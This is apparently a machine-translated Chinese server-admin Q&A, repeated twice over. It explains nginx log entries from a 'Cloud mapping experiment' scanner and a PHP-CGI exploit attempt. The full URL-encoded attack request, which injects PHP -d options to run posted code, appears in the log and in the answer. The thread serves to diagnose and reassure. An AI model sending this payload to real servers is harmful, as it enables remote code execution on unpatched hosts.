在 nginx 日志中的服务器上收到 "Cloud mapping experiment" 和意外的 POST 请求
getting "Cloud mapping experiment" and unexpected POST request on server in nginx log
我在服务器 (aws-ec2) 上的 nginx 访问日志中收到意外请求。示例如下 -
54.80.128.131 - - [05/Jul/2015:03:15:22 +0000] "HEAD / HTTP/1.1" 404 0 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
204.15.135.116 - - [05/Jul/2015:03:29:23 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
HTTP/1.1" 404 5 "-" "Mozilla/5.0 (Windows NT 6.3; rv:36.0)
Gecko/20100101 Firefox/36.0"
我该怎么办?我应该担心吗?
可能不会。
您看到有人访问您的服务器并请求不存在的内容(因此出现 404)。 "CloudMapping Experiment" 部分只是随请求传入的用户代理。
我可以在这里看到关于此用户代理的类似问题,但似乎没有人知道它到底做了什么:https://serverfault.com/questions/611335/cloud-mapping-experiment-contact-researchpdrlabs-net-in-the-access-logs
我在 2 个不同的网络上看到了这个,不相关的服务。
这是我现在在反向代理上看到的最后一个:
"GET /clientaccesspolicy.xml HTTP/1.1" 301 194 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
我认为它可能是某种漏洞扫描程序,试图找到易受攻击的主机。在本例中,它正在查找名为 /clientaccesspolicy.xml 的文件。如果服务器回到防火墙,似乎有办法利用这些文件,因为它可能允许访问受保护区域:https://www.acunetix.com/vulnerabilities/web/insecure-clientaccesspolicy-xml-file
现在回答你的问题,要求:
POST /cgi-bin/php? %2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded
该请求试图通过利用 PHP 中的一个非常古老的漏洞来安装用 Perl 编写的 IRC 机器人。[1]
这并不一定意味着您的服务器被黑了。这只是意味着有人进行了尝试。它针对的 Unix 系统 运行 PHP 的一个版本容易受到 2 年前漏洞的影响。如果您在过去 2 年内至少更新过 php 一次,那么您很可能没问题:)
有人试图通过他们在用户代理中提供的电子邮件联系他们? :)
我在服务器 (aws-ec2) 上的 nginx 访问日志中收到意外请求。示例如下 -
54.80.128.131 - - [05/Jul/2015:03:15:22 +0000] "HEAD / HTTP/1.1" 404 0 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
204.15.135.116 - - [05/Jul/2015:03:29:23 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 5 "-" "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"
我该怎么办?我应该担心吗?
可能不会。 您看到有人访问您的服务器并请求不存在的内容(因此出现 404)。 "CloudMapping Experiment" 部分只是随请求传入的用户代理。
我可以在这里看到关于此用户代理的类似问题,但似乎没有人知道它到底做了什么:https://serverfault.com/questions/611335/cloud-mapping-experiment-contact-researchpdrlabs-net-in-the-access-logs
我在 2 个不同的网络上看到了这个,不相关的服务。
这是我现在在反向代理上看到的最后一个:
"GET /clientaccesspolicy.xml HTTP/1.1" 301 194 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
我认为它可能是某种漏洞扫描程序,试图找到易受攻击的主机。在本例中,它正在查找名为 /clientaccesspolicy.xml 的文件。如果服务器回到防火墙,似乎有办法利用这些文件,因为它可能允许访问受保护区域:https://www.acunetix.com/vulnerabilities/web/insecure-clientaccesspolicy-xml-file
现在回答你的问题,要求:
POST /cgi-bin/php? %2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded
该请求试图通过利用 PHP 中的一个非常古老的漏洞来安装用 Perl 编写的 IRC 机器人。[1]
这并不一定意味着您的服务器被黑了。这只是意味着有人进行了尝试。它针对的 Unix 系统 运行 PHP 的一个版本容易受到 2 年前漏洞的影响。如果您在过去 2 年内至少更新过 php 一次,那么您很可能没问题:)
有人试图通过他们在用户代理中提供的电子邮件联系他们? :)